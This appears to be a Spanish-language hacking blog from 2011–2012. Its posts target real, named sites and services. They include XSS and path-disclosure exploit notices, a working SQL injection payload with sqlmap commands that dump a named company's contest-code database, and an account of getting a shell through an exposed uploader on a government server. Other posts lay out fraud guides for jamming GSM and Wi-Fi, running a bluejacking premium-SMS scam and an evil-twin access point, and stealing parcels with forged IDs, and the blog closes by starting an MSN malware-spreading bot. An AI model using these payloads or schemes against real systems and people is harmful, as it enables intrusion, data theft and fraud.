Maztor [In]-Security

Xss & Full path Disclosure WebApp Library SIABUC

2012-02-24T12:28:00.005-08:00

# Author: Mazt0r
# Exploit Title: XSS & Full Path Disclosure SIABUC
# Date: 24/02/2012
# software: SIABUC
# link: http://siabuc.ucol.mx/
# Version: Version 1.2 [Other versions "NO TESTED"]
# Category: webapps Library
# Tested on: Linux

Demo:http://www.cidcacs.iis.ucr.ac.cr/

----------------
Vulnerable
----------------
/reservacion/index.php
/reservacion/include/buscar.php

Exploit:
======================

http://localhost/reservacion/index.php

POST: XSS
Result: /reservacion/include/buscar.php
======================
Example:
======================

|---------------------|
|" > < h1 > A < / h1 >|
|---------------------|
\
- Execution Code

Result FPD: Notice: Trying to get property of non-object in C:\ABCSIS\Reservacion\include\buscarws.php on line ***

"© Derechos reservados 2010, Universidad de Colima. Página desarrollada por el departamento de SIABUC"

----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------

LINK: Report

Exploit Full path disclosure and Sql Error ONLINE SHOP IGT

2012-02-24T11:53:00.002-08:00

# Author: Mazt0r
# Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT
# Date: 24/02/2012
# software: IGT Online Shop
# link: http://www.igt.com.hk
# Version: ALL
# Category: webapps
# Google dork: inurl:company_index.php
# Tested on: Linux

----------------
Vulnerability
----------------

Exploit:
======================

http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]

======================
Example:
======================

http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=

Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3

Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]

----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
======================== Camaradas! DDLR & CL ===============================================
Greetz : zer0-zo0rg | Zeux0r | SeguridadBlanca | k4rl | Pum4 | TheLatin | 4t0m1x | Destroyer
-------------------------------------------------------------------------------------------===

LINK: Exploit

Inactividad por unas semanas!

2012-02-10T16:46:00.000-08:00

Bueno, debido a mi reciente ingreso a la universidad me temo que al estar en un ambiente nuevo, no se aun a lo que me enfrento, en referencia a esto me dedicare estas semanas iniciales al estudio para coger campo y no distraerme de forma externa, una vez me haya acostumbrado seguire escribiendo los articulos como se venia haciendo anteriormente.

Saludos! Espero me comprendan.

Avatar Antikiddies [Evasion de inexpertos LOGUEADOS]

2012-01-17T12:11:00.000-08:00

Bueno esta entrada es algo peculiar y a manera de JODA en su momento, Sin nada que hacer me di cuenta que la red social de Twitter tiene unos pequeños bugs de px preestablecidos en sus avatars, ya que lo que hace es tomar una proporcion central de una imagen y tomarlo como pic personal, Tambien hay otra forma de poner una imagen de proporciones NO PERMITIDAS EN TWITTER, asi como lo hizo @Xianur0 hace un tiempo poniendo una imagen gigantezca para joder un rato.

Aprovechando estos pequeños errores se puede organizar una imagen proporcional que haga 3 funciones, La de AVATAR , la funcion loca de mantener la privacidad del perfil y que ALERTE al individuo mediante un CARTEL, generando como resultado una imagen similar a esta.

Plantilla Avatar Antikiddies

Al subir esta imagen organizada en PX y en sus sectores adecuados se obtiene un perfil con los siguientes resultados:

Como se puede observar Solo sale un sector de mi avatar el cual es el adecuado para el perfil, pero si vemos muy bien sus proporciones notamos la barrera TRANSPARENTE como si se tratara de layers, la funcion de esta barrera es que UN USUARIO LOGUEADO no pueda ver los links que listan SEGUIDORES, SEGUIDOS, TWEETS, LISTAS.

------------ESTA BARRERA SOLO SIRVE CUANDO UN USUARIO ESTA LOGUEADO----------------

Ya vimos como se reparten las distintas secciones del avatar, ahora veamos que pasa si le damos click al link de SEGUIDORES.

Se resalta el sector protegido y te lleva a la Alerta que habiamos sectoreado en el avatar.

Conclusion: Este Avatar Antikiddies como su nombre lo dice sirve para los usuarios Inexpertos o de ignorancia en el tema, que al estar logueados no podran visualizar ciertos links de interes en un perfil definido.

Cabe aclarar que esto NO PROTEGE UN 50% esos links, debido a que si no se esta logueado se podran ver perfectamente, al igual que si se quita la imagen mediante complementos como "Web developer" o viendo la cuenta mediante cualquier cliente.

Esta imagen sectoreada ademas de este objetivo se puede aplicar como medio de burla y diversion.

Inhibidores de Señal 2da parte [El escenario perfecto] [GSM-Bluetooth]

2011-12-17T17:57:00.001-08:00

Como era de esperarse... aqui les tengo la segunda parte de "inhibidores de Señal" que les habia prometido en el articulo anterior.

Este segundo solo tratara de señales GSM y Bluetooth, las cuales mostraré como hacer un ataque dirigido, el cual se realizará con informacion que tengamos a la mano.

Primero que nada un poco de terminologias...
-----------------------------------------------------------------------------------
GSM
Segun wikipedia..

El sistema global para las comunicaciones móviles (GSM, proviene del francés groupe spécial mobile) es un sistema estándar, libre de regalías, de telefonía móvil digital.

Un cliente GSM puede conectarse a través de su teléfono con su computador y enviar y recibir mensajes por correo electrónico, faxes, navegar por Internet, acceder con seguridad a la red informática de una compañía (red local/Intranet), así como utilizar otras funciones digitales de transmisión de datos, incluyendo el servicio de mensajes cortos (SMS) o mensajes de texto.

GSM se considera, por su velocidad de transmisión y otras características, un estándar de segunda generación (2G). Su extensión a 3G se denomina UMTS y difiere en su mayor velocidad de transmisión, el uso de una arquitectura de red ligeramente distinta y sobre todo en el empleo de diferentes protocolos de radio (W-CDMA).

Seguir leyendo el texto de wikipedia
-----------------------------------------------------------------------------------

Bueno iniciemos la objetividad de este articulo...

Ya hemos leido anteriormente sobre 1-Inhibidores 2-señales 3-GSM; con estos terminos bien claros supongo que podras tomarte mas idea... de lo que realmente hablo y planteo en esta serie de articulos.

Ahora debemos plantear un NUEVO! "ESCENARIO PERFECTO" desde la perspectiva de un "Atacante Malicioso", Este nuevo Escenario será.. "EL PUESTO DE LLAMADAS" del cual nos aprovecharemos de su multitud de gente alterada y con poco tiempo disponible.

Nuestro Escenario:

Puesto de llamada de nivel: Intermedio
Encargados del puesto de llamadas: 1
Cantidad de personas hablando por cel: 12
Cantidad de personas en espera: 6

----------------------------------------------------------------------------------

Ahora procedamos a realizar nuestro ataque, que en este caso el beneficio sera...?
DINERO $$$, la idea de esto es lograr que el encargado o uno de sus clientes nos transfiera una suma grande de dinero mediante un simple SMS, el cual estara todo "PLANEADO" por asi decir..

Nota clave: de logica sabemos que los puntos de llamada "LA MAYORIA" son de planes "POSTPAGO", es importante saberlo porque te permite dar nocion a cual gran suma poner en tu servicio de cobro.

Primero que nada deberiamos tener un haz bajo la manga y este seria un Servicio SMS que configurariamos para que sea de cobro, eso si un cobro de gran SUMA! el cual si un telefono postpago envia un SMS al numero de nuestro servicio le cobraria la alta suma que habiamos puesto antes... que lindo no?

Iniciemos...

Con nuestro servicio SMS pedido y configurado solo procedemos a usarlo? pero de una forma arbirtraria y sin aviso alguno...

Vamos a montar nuestro INHIBIDOR de SEÑAL GSM :) cerca del puesto de llamadas objetivo, el cual la comunicacion se cortara en esa zona...

Ahora con un sistema de administracion Bluetooth, ya sea un Smartphone con una APP especifica o lo mas recomendable una PC CON BLUETOOTH vamos a analizar todos los dispositivos activos en ese sector para proceder a enviar nuestro "SMS Señuelo".

La pregunta sera..como enviare el SMS si el GSM esta inactivo en esa zona, y peor aun no se los numeros!!??

Primero que nada el GSM esta inactivo, bien dicho!... pero la señal bluetooth no :)
segundo, realmente no enviaremos un SMS asi que no necesitaremos numero telefonico, haremos uso de la tecnica Bluejacking!

Termino Bluejacking:
En seguridad informática, el término bluejacking se refiere a una técnica consistente en enviar mensajes no solicitados entre dispositivos Bluetooth, como por ejemplo teléfonos móviles, PDAs o portátiles. La tecnología Bluetooth tiene un alcance limitado de unos 10 metros normalmente en dispositivos pequeños (como teléfonos móviles) aunque otros aparatos más grandes (como portátiles) con transmisores más potentes pueden alcanzar los 100 metros. (Segun wikipedia)
---------------------------------------------------------------------------------

Mientras analizamos los dispositivos activos bluetooth debemos ver y coordinar los MTS a la redonda ademas de ver que dispositivos son los que podrian recibir los "SMS Arbirtrarios".

Una vez obtenido nuestra lista de objetivos y puntos clave para que reciban nuestro señuelo, debemo armar nuestra LETTER Corporativa la cual contendra el Numero de nuestro servicio.

Letter corporativa de Ejemplo:

Sr usuario la señal de su dispositivo movil se ha desactivado por inconvenientes, esta sera habilitada dentro de las proximas 72 hrs, si su linea es de vital importancia debido a su ocupacion, puede restaurarla enviando un SMS con la palabra RESTAURAR al 6666

------------------------------------------------------------------------------

Nota: donde 6666 es nuestro numero de servicio SMS el cual es de un costo altisimo...
-------------------------------------------------------------------------------

Una vez enviado los SMS SEÑUELO a todos los de nuestra lista de objetivos a la redonda, estos o algunos.. intentaran la restauracion de su servicio.

La pregunta ahora es... serà que van a caer?

Primero que todo pensemos... El escenario del Puesto de llamadas fue planteado por las siguientes razones...

1- Si el encargado tiene su bluetooth activado y recibe esto que pasa?

a-casi un 90 % seguro que lo hace, por que su ocupacion esta siendo suspendida la cual le generaria perdidas...

b- la multitud de gente en espera lo pone en un momento de poco pensar y de mucho hacer, asi que la solucion esta en el sms que se le envio y asi podra seguir y dejar a sus clientes satisfechos

2- Que pasa si el encargado no esta con bluetooth activo?
a- para eso dige que hay que sacar la lista de objetivos...por que de seguro muchos tienen llamadas importantes que hacer y no dudaran ni un min para hacer un pronto reestablecimiento de su servicio.

-------------------------------------------------------------------------------

Una vez que estos reciban los SMS señuelos debemos apagar nuestro inhibidor por unos segundos, muy recomendable unos 30 Seg... y enviar un nuevo SMS que diga..

Letter Ejemplo 2:
----------------------------------------------------------------------------------
Su servicio esta en mantenimiento y se generara una intermitencia en su señal, si desea restaurar su servicio lo mas pronto posible, favor enviar un SMS con la palabra RESTAURAR al numero 6666.

----------------------------------------------------------------------------------
Se desactiva el inhibidor....

Rectificando mucho el atacante en su Servicio de SMS podria notar si aun los dispositvos objetivos no han dado respuesta...cuando este note si se ha logrado captar una gran suma.. ya deberia dejar de activar su inhibidor y dejar todo estable.

Nota: El estado de intermitencia de un inhibidor se hace con el objetivo de persistir y que se haga mas tedioso para los usuarios.. con el fin de que su desespero los haga tratar de restablecer su servicio lo mas pronto posible mediante las instrucciones que se le dieron en el sms.

Conclusion: Este articulo fue creado desde la perspectiva de un atacante malicioso, sin ningun motivo de orientar al robo y con la simple gracia de enseñar y notificar las infinidades de tecnicas que se pueden usar en este "Escenario" tan inseguro!

Inhibidores de Señal [El escenario perfecto] [WIFI]

2011-12-07T19:01:00.000-08:00

[Bueno debido a mi ausencia durante unas semanas, surge este articulo que lo dividire en 2, segun los tipos de señales que explicaré (WIFI, GSM).]

Este articulo se me ocurrio hacerlo por un "Recuerdo de viejos tiempos"; la ausencia que tuve estos dias fue debido a mi traslado de apartamento, viendo en el trasteo las cosas viejas que tenia... logre notar una pequeña caja negra pegada con cinta y hecha con un esquema demasiado rustico!!

Pero que era exactamente esa pequeña caja negra?

Esta pequeña caja era un INHIBIDOR DE SEÑAL que fue el resultado de unas pocas clases de electronica que habia tomado un compañero. Era demasiado rustico y no carecia de una funcionalidad excelente debido a que era casera y no se tenian unos masteriales de alta calidad, pero te preguntaras...

Que es un inhibidor o perturbador de señal?

Segun wikipedia

En Telecomunicación, un perturbador, también denominado inhibidor es un Dispositivo electrónico que impide o dificulta las transmisiones radioeléctricas en un determinado rango de frecuencias mediante la emisión de una señal de mayor potencia que la del emisor que quiere transmitir.

Se compone básicamente de un generador de señal y un transmisor. El primero genera una señal que es enviada a través del segundo con una potencia determinada según la necesidad. Esta señal carece de información útil, únicamente es una señal generada por un oscilador o generador de onda. Ésta, al emitirse con mayor potencia que los sistemas de transmisión a interferir, las suprime, evitando que emisor y receptor establezcan la comunicación.

Se utiliza principalmente por motivos de seguridad o con intenciones de sabotaje.

--------------------------------------------------------------------------

Segun MaztoR

Dispositivo que no permite un transcurso de señal, impidiendo, dificultando y/o creando difusion en el receptor por que esta ocupa esa frecuencia con otra señal mucho mas potente. :P (corregirme si estoy mal)

--------------------------------------------------------------------------

Bueno iniciemos la objetividad de este articulo...

ya sabemos perfectamente que es un Inhibidor de señal (si no te quedo claro para eso esta google XD) pero ahora debemos plantear un "ESCENARIO PERFECTO" desde la perspectiva de un "Atacante Malicioso" la cual consta de reemplazos o sustituciones de puntos de acceso para asi el atacante obtener un "beneficio" y una administracion de conexiones o host vibrantes en el punto "CLON" que logicamente sera el que nosotros pondremos de señuelo.

primero que nada cabe hay que aclarar ciertos puntos:

1- Un inhibidor tiene un rango de X MTS/KMTS definidos a la redonda (todo depende del tipo de inhibidor)

2- Aqui se planteara un escenario usando inhibidores portables y de poco alcance (ya sabran el porque)

Primer Escenario... [El Centro Comercial]
-------------------------------------------------

Bueno viendo bien el grafico se puede notar que lo que hacemos es dejar a un cierto grupo de personas sin recepcion de señal y creando un nuevo punto de acceso con un nombre COPIA para hacer confusion en los usuario, copn el objetivo de que intente un reconexion buscando en su lista de detectados (logico no saldra nada por que la zona esta inhibida) pero dejamos el inhibidor unos 10 min para que los usuarios pierdan la total conexion WIFI por que si lo hacemos en fraccion de segundos no habria desconexion debido a que hace reconexion simultanea, al estar seguros de una desconexion total desactivamos el inhibidor y hacemos que nuestro punto de acceso este lo mas cerca posible con el objetivo de que elijan el punto "CLON" con mas señal, osea el de nosotros por la cercania no les parece?....

Nota: hay muchas formas de hacer puntos de acceso, te doy algunas ideas... usando tus Dispositivos Iphone, ipad por la portabilidad, con portatiles + modems etc.

Bueno ya teniendo un punto de acceso propio podemos hacer una administracion de nuestros host activos, pudiendo interceptar su trafico, sniffearlos o como le quieras hacer :)

Ahora te preguntaras.. no es mas facil conectarse al punto principal (original) y evitar todo este proceso?

Veamos no escribo cosas por nada jajaja, que tal si la clave no la sabemos?

Repuesta
creamos el punto de acceso sin clave y que sea CLON, para una conexion mas directa para los usuarios.. por que si le ponemos clave... ellos no la sabria debido a que pondrian la clave que ellos saben, pero como no la sabemos hay perdida...

De que sirve si las pcs pueden tener palomeada la opcion de "Conectarse automaticamente"

Respuesta

Simple con ingenio se logra que conecten al punto "CLON".. haber te doy una idea..

PUNTO ORIGINAL LLAMADO= CENTROCOMERCIAL
PUNTO CLON LLAMADO= CENTROCOMERCIAL ESTABLE

ponemos el inhibidor en intermitencia para que haga una especie de prendido/apagado y los usuarios tengan una pesima señal... asi que veran el punto de wifi "ESTABLE"
y decidiran usarlo :) (Este se prueba en intervalos para no perjudicar las conexiones a nuestro punto de acceso)

Este es realmente un Escenario perfecto?

La segunda parte tratara sobre inhibidores de señal telefonica GSM, Saludos y happy Attack?

Exposed! W4 ICFES.. tan inseguro que parece a proposito?

2011-11-18T12:07:00.000-08:00

Bueno sin hacer nada me puse a divagar en "PAPI GOOGLE" dorkeando en algunas webs del gobierno.. haciendo combinaciones y viendo que resultados obtendria.

[Se muestra el procedimiento tan simple y basico de acceso para demostrar que la entrada a este servidor colombiano TAN PRESTIGIOSO! no fue mas que una ESTUPIDEZ!]

comence probando con PRESI***CI* solo logre ver algunos datos y documentos en directorios cerrados.. pero me aburri XD! de tanto buscar, pero me acorde que hace unos dias habia visto XSS en la web del ICFES y supose que al tener algunas zonas administradas con code propio para sus gestiones etc, supuse que habria algo mas COMPROMETEDOR :) y decido armar la siguiente dork:

intext:you have an error in your sql syntax site:icfes.gov.co

En busca de vulnerabilidades SQLI tanto internas como en variables...

Como resultado solo obtuve 1 IRONICO NO?

veamos que es lo que hay despues de ese link :)

http://w4.icfes.gov.co:8091/its-gestion/lib/mejora/ciclos.php?anio_auditoria=

la verdad vi las variables y me desilucione un poco pero vi la cadena de directorios...

/its-gestion/lib/mejora/

INDEXADOS! ~~cuantas veces hay que resaltar~~ que dejar los directorios a la vista de todos esta MAL! :( muy MAL! y mucho peor si hay tanta INFO y sub-directorios como en este caso...
Demos un pequeño repaso... en los directorios :)

DEMASIADO NO? hasta el punto de hecharme a reir y pensar PARECE TODO A PROPOSITO XD!

naveguemos un poco por http://w4.icfes.gov.co:8091/its-gestion/lib/meci/

Notaremos en el directorio /meci/ varios archivos y un presunto UPLOADER! :)

Analizando el escenario se supone que lo que se suba por medio de adjuntar_archivos.php quedaria en el directorio ~~Archivos~~ logico no?

Al intentar subir algo veamos el resultado !!

Errores sql bla bla bla y mas bla.. a veces salen errores y sentencias pero el archivo logra subir.. pero en este caso no es asi :/

me dio algo de intriga a la vez... asi que decido jugar con las variables :)

Antes: /adjuntar_archivos.php?id=
despues: /adjuntar_archivos.php?id=1

Al dar enter el uploader se veia un mejor y con el mensaje de limite

y al subir algo :) salia un listado brindandome 2 opciones de nombre y eliminar :)

Como cambio la cosa no? ahora veamos que nos brinda nuestra shell :)

Los 2 discos o particiones no me fije XD Activos en WINDFUCK son C:/ y D:/

Conclusion!
Con todo esto y analizando este articulo parece todo de primaria no?
Creanme que con solo un "deny" o un index en blanco no se hubiera llegado muy lejos en la exploracion de archivos y directorios a menos que se use un brute dir o brute name pero ya seria un metodo mas complicado....

Interceptacion de Entregas y Paqueteria "Servientrega"

2011-10-27T16:53:00.000-07:00

Bueno en este articulo voy a hablar de un servicio muy conocido llamado "Servientrega" muy similar al famoso "FEDEX", el cual para quien no lo sabe es un sistema de mensajeria y paqueteria USUALMENTE puerta a puerta o de recogida central.

Hoy 27 de oct de 2011 venia de clases y decidi pasar por la central a ver si ya me habia llegado un paquete que me habia enviado 2 dias atras, entregue mi tarjeta de identificacion y me digeron que ya estaba hay y que se podia retirar, bueno analizando la situacion todo muy bien, pero note que con solo dar ciertos datos y tener una identificacion se podria retirar un paquete sin problemas, vaya!! es muy "DIFICIL" ante muchos conseguir toda la informacion de un envio:

quien envia, quien recibe, lugar, identificaciones ,etc.

Mucho mas dificil tener la identificacion del receptor!! hacerse con ella y obtener un paquete, al parecer todo esta bien por que es "DIFICIL" conseguir toda esa info sin conocer a la persona, seamos francos y vayamos a la realidad.

Al retirar mi paquete tenia que pagar un valor que se definia segun la distancia y el peso como en el momento no estaba conciente de que la persona que enviaba no iba a pagar el envio y era del metodo "AL COBRO" (el cual consiste en pagar una vez recibido el paquete) decido ir a mi casa y buscar dinero para poder hacer el retiro!, aqui es donde se enciende la luz... al ver mi NUMERO DE GUIA lo meti en el Rastreador de envios que tiene la pagina.

www.servientrega.com/wps/portal/inicio

Me imprimio los datos completos de mi envio... asi que decido crear un numero secuencial para ver si habia otro numero de guia y correspondia a otro paquete.

Mi numero de Guia= 7171257XXX
Numero Aleatorio= 7171257298

Efctivamente el numero secuencial con las ultimas tres cifras aleatorias me dio la informacion completa de un envio que claramente no era el mio.

Imagen no omitida por ser un caso real y con ejemplificacion no puesta en practica con este terciario

vaya es info linda y valiosa...logramos ver:

REMITENTE
DESTINATARIA
DIRECCIONES
FECHAS PIEZAS
DESTINOS
y Lugar donde se encuentra el paquete :D

Ahora como muchos saben el photoshop hace maravillas!! y con un facil manejo de nivel basico-medio se puede hacer un Identificacion falsa.

Te preguntaras "ESTO NO FUNCIONARA" esa gente sabe como detectar eso y lo otro y bla bla bla... MENTIRA!! en el tiempo que llevo recibiendo paquetes y mi analisis segun su comportamiento NUNCA se han fijado en datos distintos a los ESENCIAL [NOMBRE Y NUMERO DE ID] asi que en pocas palabras la seguridad de informacion que fluyetanto entrante como saliente es INSEGURA!!

Planteemos el Escenario

1-Tenemos la ID falsa lista
2-Hacemos una llamada a la central para saber si el articulo aun esta en bodega
3-se repasa un poco la info de memoria, no se quiere fallar al momento de las preguntas superficiales.
4- se recibe el articulo y te vas.

QUE INSEGURO NO???

Seamos francos, lo peor de todo es que los numeros de GUIAS se pueden explorar en rangos y nos da distintos DESTINOS y LUGARES DE ENVIOS, es dificil para un particular estar viajando y cazando los envios de otros, pero pensemos.. que tal si una organizacion de varias personas en todo el pais, [ESTO SE PUEDE GRACIAS A INTERNET] se dedica a esto? creanme que muchos envian cosas de valor y podrian haber perdidas millonarias.

Nota:no en todas se fuga la ID del cliente, dependiendo del tipo de documento esta sera impresa.

Fugas: CC No se Imprime , TI si se imprime, DT si se imprime, otro Tipo de Documento si se imprime.

CONCLUSION

No esta demas aclarar que mis articulos no son probados CON TERCEROS REALES debido a que si algo falla no quiero terminar en la carcel jajaja y la idea no es ROBAR es analizar la seguridad para reforzarla y que errores asi no lo sepan personas con fines perversos.

Pero tambien aclaro que esto fue probado 100% en el cual un amigo se hace pasar por mi para retirar mi paquete ;) y todo salio bien, que inseguridad por dios jajaja PWNED!!!

Saludos y greetz: DRAGONJAR - DDLR - CYBERLOCOS

EXPOSED!! PEPSI "Change The game"

2011-09-21T19:00:00.000-07:00

Bueno abriendo esta categoria en mi blog, decido inaugurar por asi decir jajaja con un bonito,curioso,beneficiario "EXPOSED" hecho a la web de "PEPSICHANGETHEGAME" perteneciente a la conocidad marca de bebidas gaseosas "PEPSI".

Debido a mi curiosidad decido armar una dork de la siguiente forma:

intext:You have an error in your SQL intitle:pepsi

Al ver que la variable no cogia debido a que ya era un error PRINT decido dorkear en busca de variables.

Un compañero [Qosmio] me dio un PoC pero no me funko debido a que el servidor donde alojo el GIE estaba algo lento.
asi que decido hacer un Flash Manual para lograr ver de forma superficial...

http://www.pepsichangethegame.com/userimage.php?id=-642%20union%20all%20select%201,Replace%28Group_concat%28Cast%28Table_Name%20AS%20CHAR%29%29,0x2c,0x3c62723e%29%20from%20information_schema.tables--

al notar sus TABLAS: pepsi_wc_usermaster y pepsigame ; supuse que tendrian info DIRECTA de los usuarios.. si era cierto, completamente cierto!! pero bueno se preguntaran, que tiene una db mas?

De hay salio mi duda, es PEPSI NO? debe promocionar o tener algun concuros con sus bebidas!!
Claro esa era la respuesta, pepsi tenia un concurso de CODES debajo de las tapas los cuales al ser ingresados te daban un premio si acertabas con el GANADOR!

Decidi loguearme con un user normal y buscar que encontraba....

Encontre esto: http://www.pepsichangethegame.com/winner.php

Que al parecer es una lista con los "GANADORES" de el concuro; [Cuando vi IPOD WINNER's Me dieron ganas de que lo hicieran en mi pais con la misma web jajaja]

Al ver los supuestos codes que se SUPRIMIAN en algunos caracteres afirme! que tenia que haber un lugar que verificara estos codigos para certificar si era Ganadores o perdedores de dicho premio.

La respuesta estaba en las dbs claro!!

http://www.pepsichangethegame.com/userimage.php?id=-642%20union%20all%20select%201,Replace%28Group_concat%28Cast%28Table_Name%20AS%20CHAR%29%29,0x2c,0x3c62723e%29%20from%20information_schema.tables--

TABLAS:
wap_codes <---- CONTIENE CODIGOS NO SE DE QUE JA!web_codes <---- CONTIENE CODIGOS DE LA WEB [Supongo que son para el concurso]winners <----- [GANADORES del concurso]

Bueno ya hice mis ideas con esas tablas y su contenido ahora, a que viene todo? se saca un CODE se ingresa y te ganas un IPOD WUALA!! XD! [No esta Probado debido a que esta promocion no es dirigida para mi pais]

[Escrito TEORICO, no ha sido comprobado]

Quieres Manipular las DB y TABLAS DE PEPSI CHANGE THEGAME?

Entrada para Newbies & Dummies: GIE DB "PAN COMIDO"

[La tool para explorar dbs no es NEWBIE, el mensaje solo es para los usuarios Espectadores que quieran ver superficialmente y no quieren hacer las consultas directas]

TABLA: pepsi_wc_usermaster
TABLA: pepsigame
TABLA: wap_codes: ./sqlmap.py -u http://www.pepsichangethegame.com/userimage.php?id=456 --dump -T wap_codes -D pepsictg
TABLA: web_codes:: ./sqlmap.py -u http://www.pepsichangethegame.com/userimage.php?id=456 --dump -T web_codes -D pepsictg

[Resto de las Tablas Suprimidas por que no se le ve importancia a la info contenida]
Nota: si deseas descargar/dumpear las tablas sobrantes puedes seguir el PoC: http://www.pepsichangethegame.com/userimage.php?id=-642%20union%20all%20select%201,Replace%28Group_concat%28Cast%28Table_Name%20AS%20CHAR%29%29,0x2c,0x3c62723e%29%20from%20information_schema.tables--

Descargar BD COMPLETA? Via SQLMAP: ./sqlmap.py -u http://www.pepsichangethegame.com/userimage.php?id=456 --dump-all -D pepsictg

Bug de caracteres y limite en "windows live msn" via IPHONE

2011-07-15T10:45:00.001-07:00

Resulta que hace unos dias de estrenar mi iphone nuevo decído instalarle las aplicaciones sociales despues de su respectivo jailbreaka mi iphone, todo muy bien!!

probando skype, twitter, hasta mi cuenta de dropbox share y al final recorde que me faltaban 2 clientes muy esenciales!! el cliente irc y el cliente msn.

al instalar la app oficial de msn por "microsoft corporation" via: App Store, una vez terminado mi hermana me pide prestado msn y se lo dejo unos 30 min y todo bien!!

al yo hacer mi loggeo me salta lo siguiente!!:

IMAGEN EN SERVIDOR OFFLINE

pues normal... pense que se habia escrito mal... intente otra vez y de nuevo!!
multiples veces intentando y nada....pues me asuste y pense PWNED me dirijo rapidamente a SAFARI e intento con HOTMAIL y nada :S luego con OPERA y nada!! pues enseguida voy a la pc y todo bien, quede algo desconcertado... al ver el numero de caracteres intente formular otra passwd con el mismo numero de esta y cambiarla para testear y efectivamente no funkaba, para estar mas seguro ingrese con otra cuenta y una passd de 6 caracteres y todo iba bien!! luego decido cambiar esta clave de 6 por una de igual caracteres a la que no me dejaba ingresar, y al intentar el logueo... ERROR!! asi que la solucion para poderle ingresar fue usar una contraseña no muy robusta y asi se me permitiese el logueo.

IMAGEN EN SERVIDOR OFFLINE

En pocas palabras mi solucion fue usar una contraseña de carcateres habituales entre los 5 o 10 ya que si esta se pasa no permitiria el acceso desde dispositivos IPHONE.

Esto fue testeado en 2 dispositivos IPHONE 3G /*MB si pueden probar en MC u otras versiones no estaria mal.
Espero se animen a testear y ver si en otros dispositivos les sucede de esta marca APPLE.

Donde esta realmente el Bug?

Simple debido a que la intencion de este articulo no es AFIRMAR DE FORMA DIRECTA que es un BUG establecido y definido por errores de la empresa. si no una limitacion que obliga al usuario a no tener passwd con seguridad fuerte y mientras el atacante sepa realmente de donde viene dicha conexion puede facilmente realizar un ataque de fuerza bruta acertando el numero de caracteres de la passwd.

EJEMPLO: se tenia una clave del tipo: asf896agbjkq109nql)%b1lk182336
DEBIDO AL LIMITE: se somete al user usar una clave de tipo: 4j50ñ3f23

Ahora viene... Que es mas facil romper?
tu passwd anterior de caracteres INDEFINIDOS: asf896agbjkq109nql)%b1lk182336
o tu passwd nueva sometida a un numero definido de caracteres que todos tienen conocimiento de el: 4j50ñ3f23

El Atacante solo con saber el tipo de via de la conexion podria realizar o poner en marcha un ataque de tipo DEFINIDO.

ATACANTE: mediante tecnicas de fingerprint se define que el USUARIOX se conecta via IPHONE desde el cliente Wlmsn de Microsoft y define que el usuario habitual de este medio deberia tener una PASSWD entre 5 y 10 caracteres.

Se programa un ataque por fuerza bruta o diccionarios definiendo que los caracteres a ingresar sean entre 5 y 10 para poder romper la entrada.

Aunque podria llevar algo de tiempo dependiendo del tipo o grandeza de la contraseña, se podria afirmar que el resultado final seria ESTABLECIDO debido al conocimiento real de los caracteres limites.

Instalando Menus y artilleria de Backtrack 5 en una distro terciaria

2011-06-30T19:05:00.000-07:00

Bueno siendo amante de LINUX quiero decir que me gustan las distro personalizadas y estructuradas por mi, con la llegada de BT5 decidi instalarmelo como S.O principal y la verdad no me agrada.. se pude decir que es una exclente distro de seguridad pero a manera de LIVE CD por que en realidad como un S.O principal no me agrada mucho, algo tedioso segun mi parecer.

NOTA: la pagina oficial de backtrack 5 afirma que no es recomendable instalar y/o agregar repositorios en distribuciones terciarias a esta, ya que puede presentar paquetes rotos y dependencias que no se pueden satisfacer, en cambio si te consideras un usuario de nivel intermedio o avanzado y puedes desenvolverte bien en linux, podras enfrentarte a este tipo de problemas que podrian ser futuros.

NOTA2: si sabes hacer las cosas y dominar linux creeme que no tendras ningun tipo de problemas ya que podras darle solucion alguna si llegara a pasar.

Comenzemos

Primero que nada necesitamos lo siguiente:

Archivos necesarios

Bueno abrimos una terminal y tecleamos:

gksudo nautilus

Una vez nos vamos al directorio /etc/xdg/ donde veremos una carpeta nombrada "menus" ahora cogemos la carpeta menus que descargamos al inicio del articulo pegandola en el directorio /etc/xdg para sustituir la que ya estaba estructurada, RECOMIENDO HACER BACKUP.

una ves hecho esto abrimos una terminal y tecleamos:


sudo gedit /etc/apt/sources.list

Agregamos los repositorios de BT5:


###########BACKTRACK 5###################################
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

le podimos la Llave al servidor


wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

y finalizamos con un

sudo apt-get update

Vista Previa con algunas herramientas instaladas que activaron ciertos menus categoricos:

No se ve tan cargado como el original de bT5 por que no he instalado todas las tools que este trae, solo instale algunas para mostrar la previa en este presente articulo.

Para poner los menus en nuestro idioma natal solo basta con editar el archivo applications.menu
que se encuentra en la ruta: /etc/xdg/menus/

Previa de cambio de Idioma:

Previa del funcionamiento de una tool [0trace] seleccionada:

NOTA: los menus no seran visibles hasta que instales herramientas de BT5, cabe aclarar que cada vez que instales una herramienta el menu te las organiza automaticamente por categorias como el usual Backtrack5

Creando un [BOT MSN] Con fines de esparcir un Malware

2011-06-11T21:40:00.000-07:00

Bueno me inspire a crear este articulo.. ya que hace unos dias charlando con un compañero, me abrio una ventana un TIPO que Hablaba Ingles..

Duker: hello Man!!
MaztoR: Hola quien eres¿?
Duker: How are You!¿?
MaztoR: quien eres? de donde me agregas=? y que quieres¿?
Duker: My Picture is http://xxxxx.com/index.php

En pocas palabras dige! es un BOT pero no de LIVE MSN OFICIAL ya que queria simularme una Conversacion! y mientras charlabamos Decirme que si queria Ver su FOTO , IMAGEN o WEB?

"Logicamente al ver q se mantiene una Conversacion directa dirias¿?, es un humano y no un Spread! asi que vere su Pagina"

De repente Quedas Infectado con un Redirect de un INDEX.PHP hacia un EXE o Malware para Camuflar.

Ya les Conte como funciona y de que manera.. en este caso fucionaremos

ING SOCIAL + AUTOMATIZADO + COHERENCIA

Bueno a estructurar el Malware
